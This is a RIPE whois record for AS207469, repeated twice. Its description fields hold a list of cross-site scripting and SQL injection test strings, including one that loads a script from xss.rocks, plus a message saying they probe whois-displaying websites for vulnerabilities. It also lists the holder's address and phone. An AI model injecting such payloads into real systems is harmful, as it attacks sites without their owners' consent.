% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See https://docs.db.ripe.net/terms-conditions.html
% Information related to 'AS207469'
% Abuse contact for 'AS207469' is '
[email protected]'
aut-num: AS207469
as-name: SUNGYULI
descr: </textarea><script>alert(location.href,"XSS! FUX IT.")</script>
descr: <script src=http://xss.rocks/xss.js></script>
descr: <img src="javascript:alert('XSS! FUX IT.');">
descr: <img src="o" onerror="alert('XSS! FUX IT.')"></img>
descr: ' -- OR 1 = 1 AND 'SQLi' = 'SQLi'
descr: " -- OR 1 = 1 AND 'SQLi' = 'SQLi'
descr: ` -- OR 1 = 1 AND 'SQLi' = 'SQLi'
descr: <svg onload=alert%26%230000000040"XSS! FUX IT")>
descr: <svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert("XSS! FUX IT")//'>
descr: <IMG SRC=JaVaScRiPt:alert('XSS! FUX IT')>
descr: <IMG SRC=`javascript:alert("XSS! FUX IT")`>
descr: <IMG """><SCRIPT>alert("XSS! FUX IT")</SCRIPT>"\>
descr: <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
descr: <IMG SRC= onmouseover="alert('xxs')">
descr: <img src=x onerror="& # 0000106avascript:alert('XSS')">
descr: <IMG SRC=& # 106;avascript:alert('XSS')>
descr: <IMG SRC="jav ascript:alert('XSS! FUX IT');">
descr: .----------------. .----------------. .----------------.
descr: | .--------------. | | .--------------. | | .--------------. |
descr: | | ____ ____ | | | | _______ | | | | _______ | |
descr: | | |_ _||_ _| | | | | / ___ | | | | | / ___ | | |
descr: | | \ \ / / | | | | | (__ \_| | | | | | (__ \_| | |
descr: | | > `' < | | | | '.___`-. | | | | '.___`-. | |
descr: | | _/ /'`\ \_ | | | | |`\____) | | | | | |`\____) | | |
descr: | | |____||____| | | | | |_______.' | | | | |_______.' | |
descr: | | | | | | | | | | | |
descr: | '--------------' | | '--------------' | | '--------------' |
descr: '----------------' '----------------' '----------------'
descr:
descr: |--------------------------------*---------------------------------|
descr: | Hello there! |
descr: | Maybe you saw these texts in descr. |
descr: | These texts are used to test XSS vulnerability in website :) |
descr: | If you see the alert which said 'XSS' or something, |
descr: | then maybe the website you are looking at is vulnerable, |
descr: | please contact the website owner to fix this :). |
descr: | (By the way, there has a SQL injection test too.) |
descr: | |
descr: | Contact me : noc at sciuridae.network |
descr: |------------------------------------------------------------------|
org: ORG-SYL2-RIPE
import: from AS206499 accept ANY
export: to AS206499 announce AS207469
import: from AS31142 accept ANY
export: to AS31142 announce AS207469
import: from AS6939 accept ANY
export: to AS6939 announce AS207469
import: from AS205591 accept ANY
export: to AS205591 announce AS207469
admin-c: SYL9-RIPE
tech-c: SYL9-RIPE
status: ASSIGNED
mnt-by: RIPE-NCC-END-MNT
mnt-by: SUNGYULI-MNT
created: 2020-01-27T13:58:57Z
last-modified: 2021-01-05T15:57:06Z
source: RIPE
sponsoring-org: ORG-HB116-RIPE
organisation: ORG-SYL2-RIPE
org-name: Sung Yu Li
country: TW
org-type: OTHER
address: No.560 Yongan Road Luye Township, Taitung County 95541, Taiwan
phone: +886978079522
e-mail:
[email protected]abuse-c: ACRO30109-RIPE
admin-c: SYL9-RIPE
tech-c: SYL9-RIPE
mnt-ref: SUNGYULI-MNT
mnt-by: SUNGYULI-MNT
created: 2020-01-25T03:53:14Z
last-modified: 2022-12-01T17:27:20Z
source: RIPE
person: Sung Yu Li
address: No.560 Yongan Road Luye Township, Taitung County 95541, Taiwan
phone: +886978079522
nic-hdl: SYL9-RIPE
mnt-by: SUNGYULI-MNT
created: 2020-01-25T03:25:53Z
last-modified: 2020-11-16T17:09:52Z
source: RIPE
% This query was served by the RIPE Database Query Service version 1.114 (SHETLAND)
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See https://docs.db.ripe.net/terms-conditions.html
% Information related to 'AS207469'
% Abuse contact for 'AS207469' is '
[email protected]'
aut-num: AS207469
as-name: SUNGYULI
descr: </textarea><script>alert(location.href,"XSS! FUX IT.")</script>
descr: <script src=http://xss.rocks/xss.js></script>
descr: <img src="javascript:alert('XSS! FUX IT.');">
descr: <img src="o" onerror="alert('XSS! FUX IT.')"></img>
descr: ' -- OR 1 = 1 AND 'SQLi' = 'SQLi'
descr: " -- OR 1 = 1 AND 'SQLi' = 'SQLi'
descr: ` -- OR 1 = 1 AND 'SQLi' = 'SQLi'
descr: <svg onload=alert%26%230000000040"XSS! FUX IT")>
descr: <svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert("XSS! FUX IT")//'>
descr: <IMG SRC=JaVaScRiPt:alert('XSS! FUX IT')>
descr: <IMG SRC=`javascript:alert("XSS! FUX IT")`>
descr: <IMG """><SCRIPT>alert("XSS! FUX IT")</SCRIPT>"\>
descr: <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
descr: <IMG SRC= onmouseover="alert('xxs')">
descr: <img src=x onerror="& # 0000106avascript:alert('XSS')">
descr: <IMG SRC=& # 106;avascript:alert('XSS')>
descr: <IMG SRC="jav ascript:alert('XSS! FUX IT');">
descr: .----------------. .----------------. .----------------.
descr: | .--------------. | | .--------------. | | .--------------. |
descr: | | ____ ____ | | | | _______ | | | | _______ | |
descr: | | |_ _||_ _| | | | | / ___ | | | | | / ___ | | |
descr: | | \ \ / / | | | | | (__ \_| | | | | | (__ \_| | |
descr: | | > `' < | | | | '.___`-. | | | | '.___`-. | |
descr: | | _/ /'`\ \_ | | | | |`\____) | | | | | |`\____) | | |
descr: | | |____||____| | | | | |_______.' | | | | |_______.' | |
descr: | | | | | | | | | | | |
descr: | '--------------' | | '--------------' | | '--------------' |
descr: '----------------' '----------------' '----------------'
descr:
descr: |--------------------------------*---------------------------------|
descr: | Hello there! |
descr: | Maybe you saw these texts in descr. |
descr: | These texts are used to test XSS vulnerability in website :) |
descr: | If you see the alert which said 'XSS' or something, |
descr: | then maybe the website you are looking at is vulnerable, |
descr: | please contact the website owner to fix this :). |
descr: | (By the way, there has a SQL injection test too.) |
descr: | |
descr: | Contact me : noc at sciuridae.network |
descr: |------------------------------------------------------------------|
org: ORG-SYL2-RIPE
import: from AS206499 accept ANY
export: to AS206499 announce AS207469
import: from AS31142 accept ANY
export: to AS31142 announce AS207469
import: from AS6939 accept ANY
export: to AS6939 announce AS207469
import: from AS205591 accept ANY
export: to AS205591 announce AS207469
admin-c: SYL9-RIPE
tech-c: SYL9-RIPE
status: ASSIGNED
mnt-by: RIPE-NCC-END-MNT
mnt-by: SUNGYULI-MNT
created: 2020-01-27T13:58:57Z
last-modified: 2021-01-05T15:57:06Z
source: RIPE
sponsoring-org: ORG-HB116-RIPE
organisation: ORG-SYL2-RIPE
org-name: Sung Yu Li
country: TW
org-type: OTHER
address: No.560 Yongan Road Luye Township, Taitung County 95541, Taiwan
phone: +886978079522
e-mail:
[email protected]abuse-c: ACRO30109-RIPE
admin-c: SYL9-RIPE
tech-c: SYL9-RIPE
mnt-ref: SUNGYULI-MNT
mnt-by: SUNGYULI-MNT
created: 2020-01-25T03:53:14Z
last-modified: 2022-12-01T17:27:20Z
source: RIPE
person: Sung Yu Li
address: No.560 Yongan Road Luye Township, Taitung County 95541, Taiwan
phone: +886978079522
nic-hdl: SYL9-RIPE
mnt-by: SUNGYULI-MNT
created: 2020-01-25T03:25:53Z
last-modified: 2020-11-16T17:09:52Z
source: RIPE
% This query was served by the RIPE Database Query Service version 1.114 (SHETLAND)